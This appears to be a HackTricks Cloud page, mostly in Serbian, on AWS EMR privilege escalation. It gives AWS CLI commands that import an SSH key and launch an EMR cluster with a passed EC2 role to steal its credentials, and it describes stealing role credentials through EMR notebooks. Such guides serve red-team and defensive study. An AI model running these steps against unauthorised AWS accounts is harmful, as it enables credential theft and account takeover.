HackTricks CloudAWS - EMR Privesc
Tip
Učite i vežbajte AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training Azure Red Team Expert (AzRTE)
Podržite HackTricks
- Proverite planove pretplate!
- Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
- Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.
EMR
Više informacija o EMR u:
iam:PassRole, elasticmapreduce:RunJobFlow
Napadač sa ovim dozvolama može pokrenuti novi EMR cluster povezujući EC2 role i pokušati da ukrade njegove kredencijale.
Imajte na umu da bi za ovo bilo potrebno da poznajete neki ssh priv key importovan na nalog ili da uvezete jedan, i da budete u mogućnosti da otvorite port 22 na master node (možda ćete to moći da uradite pomoću atributa EmrManagedMasterSecurityGroup i/ili ServiceAccessSecurityGroup unutar --ec2-attributes).
# Import EC2 ssh key (you will need extra permissions for this)
ssh-keygen -b 2048 -t rsa -f /tmp/sshkey -q -N ""
chmod 400 /tmp/sshkey
base64 /tmp/sshkey.pub > /tmp/pub.key
aws ec2 import-key-pair \
--key-name "privesc" \
--public-key-material file:///tmp/pub.key
aws emr create-cluster \
--release-label emr-5.15.0 \
--instance-type m4.large \
--instance-count 1 \
--service-role EMR_DefaultRole \
--ec2-attributes InstanceProfile=EMR_EC2_DefaultRole,KeyName=privesc
# Wait 1min and connect via ssh to an EC2 instance of the cluster)
aws emr describe-cluster --cluster-id <id>
# In MasterPublicDnsName you can find the DNS to connect to the master instance
## You cna also get this info listing EC2 instances
Note how an EMR role is specified in --service-role and a ec2 role is specified in --ec2-attributes inside InstanceProfile. However, this technique only allows to steal the EC2 role credentials (as you will connect via ssh) but no the EMR IAM Role.
Potential Impact: Privesc na specificiranu EC2 service role.
elasticmapreduce:CreateEditor, iam:ListRoles, elasticmapreduce:ListClusters, iam:PassRole, elasticmapreduce:DescribeEditor, elasticmapreduce:OpenEditorInConsole
Sa ovim dozvolama napadač može otići u AWS console, kreirati Notebook i pristupiti mu kako bi ukrao IAM Role.
Caution
Čak i kada sam u svojim testovima prikačio IAM role na notebook instance, primetio sam da sam uspevao da ukradem AWS managed credentials, a ne creds vezane za taj IAM role.
Potential Impact: Privesc to AWS managed role arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile
elasticmapreduce:OpenEditorInConsole
Just with this permission an attacker will be able to access the Jupyter Notebook and steal the IAM role associated to it.
The URL of the notebook is https://<notebook-id>.emrnotebooks-prod.eu-west-1.amazonaws.com/<notebook-id>/lab/
Caution
Čak i kada sam u svojim testovima prikačio IAM role na notebook instance, primetio sam da sam uspevao da ukradem AWS managed credentials, a ne creds vezane za taj IAM role
Potential Impact: Privesc to AWS managed role arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile
Tip
Učite i vežbajte AWS Hacking:
Učite i vežbajte GCP Hacking:Podržite HackTricks
- Proverite planove pretplate!
- Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
- Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.